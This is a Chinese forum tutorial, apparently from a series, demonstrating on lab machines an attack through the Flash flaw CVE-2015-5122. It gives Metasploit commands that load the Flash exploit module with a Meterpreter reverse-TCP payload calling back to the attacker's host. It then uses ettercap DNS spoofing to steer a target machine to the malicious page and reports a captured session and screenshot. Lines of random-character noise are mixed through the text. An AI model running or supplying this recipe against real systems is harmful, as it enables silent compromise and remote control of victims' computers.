|
2 M9 M' W; k- z* b! L! i
二、cve2015-5122漏洞实例演示虚拟机 , |6 w3 \+ c. a" C: G
! z b( C2 {3 k! p9 j6 l. F, P
% K1 {( p; ?( X9 ^& I 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ' n4 ^, [( M( P' W
* F" H) U9 `8 F' N( T
% |0 U$ O; R6 m- W5 s- G9 r/ A search cve-2015-5122如图:
3 u. [' l* L8 f* o) j3 B0 P* d
1 o: T9 ? ?* W7 z' E" ?7 k
1 f; W5 P& K; D( e2 s, g. d
/ F6 v* q0 G# \! N- ]" u/ l1 F( {3 S 6 o* }9 W6 B. G; }" O& z& a6 @0 x
1 m* \, d/ F' C. b& ?& T
下面我们敲如下命令: " Z' Z& \* C k. @: I4 M: h
5 u0 P T! i' m" \
2 R0 I3 [- z- _; o( V use exploit/multi/browser/adobe_flash_opaque_background_uaf
7 r5 x+ Q6 N7 c9 `
% k+ `) J Z: j# _: n
3 G" }- Z; u" z' U7 s% u ^ set PAYLOAD windows/meterpreter/reverse_tcp
2 t2 \$ ^7 U1 X( R# H2 m( e6 W 0 X% n0 U: W. l% ~7 `( D5 k+ s9 z
* U& y' s1 g% |$ A& \- D
set LHOST 192.168.0.109 3 N+ v& ~- s$ J9 [: S3 x
! R# Y* }; p! ^2 N; U Q
8 n# {) q8 h l
set URIPATH / /*根目录*/ $ Y4 f+ d1 W) z
% v& [ J! q2 O7 e, j3 S. J0 P
4 _& D5 T+ o [" { set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 $ r( N" w" [ h4 ^0 W, [
- C, b" E' e4 r0 e
[$ N* U! Z# a0 w# T set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
; N- `) h- R0 Y' ~* f5 f, ` & o1 K% K% W! a9 y ^7 n$ g# P
) s ^) Z% n" b3 o 然后show options如图: 8 X% f& g; a/ ~
9 q; H/ R8 \0 i e4 s
x; N! S# o2 p7 k) z 5 g+ j7 K% N' X) T# `, A) ~
: V7 |4 R/ a y6 D3 j" R A
7 `! m/ f+ ~2 V w3 ~8 ?5 @ 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: / }" k8 r# N# O( U
/ b ?7 p8 M5 V7 [2 B 6 Z9 l; g: x( c/ l9 ^" ]& Y
3 b: [" v8 O. b- I: ^! d 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 9 s8 I8 _1 S9 g
! \3 c( t8 b: A( ?% D) _( Y+ o; g# h* w+ y" H, `1 P# g7 ?
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
* K3 f3 Q. v' b' g" \
7 `2 I2 D9 z. v: v& g+ }! A: k: D4 W" |! A7 A U
: w% Y0 h; T+ J; U% B. ]
2 T; Q, w4 S0 k6 x! I
: H- b0 Z- G8 |( O+ c" }3 ^ 成功了,这时候我们断开ettercap,如图: 4 {( X( ]) `; S2 [8 C
$ i5 {$ t7 {: y+ M- W, Q. a' r% r& ~
5 i/ L9 T3 X" Z2 G. ` * l' Z1 B; x* ~% {- z
" t( i& U+ h5 N" H" ], O T0 ~; q2 E3 H2 b3 P
Screenshot如图: + O7 x- U( D! e2 }% j
0 k! s( m1 d" I: R+ l2 b
8 V8 f9 B& p; Q- k ' x/ ]- H! N/ ?! u% F
- z$ @+ m4 W1 s9 Y; v1 j
- H' c8 M4 H$ ?8 `
2 Q; f3 v: |8 b/ r# B0 Z4 K0 a |